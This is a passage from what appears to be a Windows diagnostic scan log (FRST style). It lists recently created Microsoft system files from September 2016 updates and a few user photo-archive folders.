    2016-09-14 01:09 - 2016-09-02 11:31 - 00503808 _____ (Microsoft Corporation) C:\WINDOWS\system32\srcore.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64win.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00215552 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdigest.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSpkg.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\srclient.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspisrv.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64cpu.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01464320 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01212928 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01163264 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00880640 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00730624 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00690688 _____ (Microsoft Corporation) C:\WINDOWS\system32\adtschema.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00463872 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00419840 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00312320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncrypt.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00190464 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpchttp.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\msaudite.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\setbcdlocale.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\msobjs.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidapi.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptbase.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidsvc.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\secur32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\credssp.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntvdm64.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\apisetschema.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00006144 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-security-base-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00005120 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-file-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-threadpool-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-processthreads-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-sysinfo-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-synch-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-localregistry-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-localization-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-processenvironment-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-namedpipe-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-misc-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-memory-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-libraryloader-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-heap-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-xstate-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-util-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-string-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-profile-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-io-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-interlocked-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-handle-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-fibers-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-errorhandling-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-delayload-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-debug-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-datetime-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-console-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:21 - 04000488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntkrnlpa.exe
    2016-09-14 01:09 - 2016-09-02 11:21 - 03944680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntoskrnl.exe
    2016-09-14 01:09 - 2016-09-02 11:18 - 01314112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 01114112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00690688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\adtschema.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00666112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00644096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00553472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00254464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ncrypt.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdigest.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msaudite.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00096768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSpkg.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msobjs.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appidapi.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srclient.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\secur32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credssp.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apisetschema.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00005120 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-file-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wow32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-string-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-io-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-console-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:02 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidpolicyconverter.exe
    2016-09-14 01:09 - 2016-09-02 11:02 - 00062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
    2016-09-14 01:09 - 2016-09-02 11:02 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidcertstorecheck.exe
    2016-09-14 01:09 - 2016-09-02 11:01 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\auditpol.exe
    2016-09-14 01:09 - 2016-09-02 10:58 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\system32\conhost.exe
    2016-09-14 01:09 - 2016-09-02 10:57 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\rstrui.exe
    2016-09-14 01:09 - 2016-09-02 10:55 - 00159744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
    2016-09-14 01:09 - 2016-09-02 10:54 - 00291328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
    2016-09-14 01:09 - 2016-09-02 10:54 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
    2016-09-14 01:09 - 2016-09-02 10:53 - 00112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\smss.exe
    2016-09-14 01:09 - 2016-09-02 10:53 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\auditpol.exe
    2016-09-14 01:09 - 2016-09-02 10:53 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptbase.dll
    2016-09-14 01:09 - 2016-09-02 10:49 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setup16.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntvdm64.dll
    2016-09-14 01:09 - 2016-09-02 10:49 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\instnm.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user.exe
    2016-09-14 01:09 - 2016-09-02 10:48 - 00006144 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-security-base-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-util-l1-1-0.dll
    2016-09-14 01:09 - 2016-08-16 13:36 - 01009152 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
    2016-09-14 01:09 - 2016-08-15 22:48 - 00833024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
    2016-09-14 01:09 - 2016-08-15 22:35 - 03218432 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
    2016-09-14 01:09 - 2016-08-06 11:31 - 00877056 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
    2016-09-14 01:09 - 2016-08-06 11:15 - 00581632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
    2016-09-14 01:09 - 2016-07-07 11:36 - 01896168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
    2016-09-14 01:09 - 2016-07-07 11:36 - 00377576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
    2016-09-14 01:09 - 2016-07-07 11:36 - 00287976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
    2016-09-14 01:09 - 2016-07-07 11:08 - 00046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpipreg.sys
    2016-09-14 01:09 - 2016-07-01 11:31 - 00976896 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
    2016-09-14 01:09 - 2016-07-01 11:31 - 00084480 _____ (Microsoft Corporation) C:\WINDOWS\system32\INETRES.dll
    2016-09-14 01:09 - 2016-07-01 11:13 - 00741888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
    2016-09-14 01:09 - 2016-07-01 11:13 - 00084480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\INETRES.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 01483264 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 00228864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 00190976 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptsvc.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptnet.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 01176064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00179200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00145920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptsvc.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00106496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptnet.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 03156480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 00098816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
    2016-09-14 01:09 - 2016-05-13 18:07 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSetupUI.dll
    2016-09-14 01:09 - 2016-05-13 17:55 - 02607104 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
    2016-09-14 01:09 - 2016-05-13 17:53 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
    2016-09-14 01:09 - 2016-05-13 17:53 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
    2016-09-14 01:09 - 2016-05-13 17:52 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
    2016-09-14 01:09 - 2016-05-13 17:52 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
    2016-09-14 01:09 - 2016-05-13 17:52 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
    2016-09-14 01:09 - 2016-05-13 17:52 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wu.upgrade.ps.dll
    2016-09-14 01:09 - 2016-05-13 17:50 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00573440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
    2016-09-14 01:09 - 2016-05-13 17:38 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
    2016-09-14 01:09 - 2016-05-12 13:14 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
    2016-09-14 01:09 - 2016-05-12 11:18 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
    2016-09-14 01:09 - 2016-05-12 11:18 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
    2016-09-14 01:09 - 2016-05-04 13:21 - 00114408 _____ (Microsoft Corporation) C:\WINDOWS\system32\consent.exe
    2016-09-14 01:09 - 2016-05-04 13:17 - 03244032 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 02365440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 01806848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\system32\msihnd.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msihnd.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimsg.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimsg.dll
    2016-09-14 01:09 - 2016-05-04 13:16 - 01941504 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
    2016-09-14 01:09 - 2016-05-04 13:16 - 00070144 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll
    2016-09-14 01:09 - 2016-05-04 11:04 - 00128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
    2016-09-14 01:09 - 2016-05-04 10:55 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msiexec.exe
    2016-09-13 21:45 - 2016-09-13 21:48 - 00000000 ____D C:\aa Samsung Master accum
    2016-09-13 01:39 - 2016-07-08 11:32 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
    2016-09-13 01:39 - 2016-07-08 11:16 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
    2016-09-12 21:48 - 2016-06-25 20:35 - 00041704 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
    2016-09-12 21:48 - 2016-06-25 20:27 - 01208320 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00756736 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00344576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntprint.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetpp.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetppui.dll
    2016-09-12 21:48 - 2016-06-25 15:54 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32spl.dll
    2016-09-12 21:48 - 2016-06-25 15:53 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntprint.dll
    2016-09-12 21:48 - 2016-06-25 15:53 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntprint.exe
    2016-09-12 21:48 - 2016-06-25 15:53 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnpinst.exe
    2016-09-12 21:48 - 2016-06-25 15:41 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntprint.exe
    2016-09-12 21:48 - 2016-06-22 09:06 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\centel.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00544256 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00219136 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
    2016-09-12 19:48 - 2016-09-17 07:41 - 00000000 ____D C:\aa Canon 600D - T3i Master accum
    2016-09-12 19:47 - 2016-09-12 19:47 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_09_00.Wdf

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

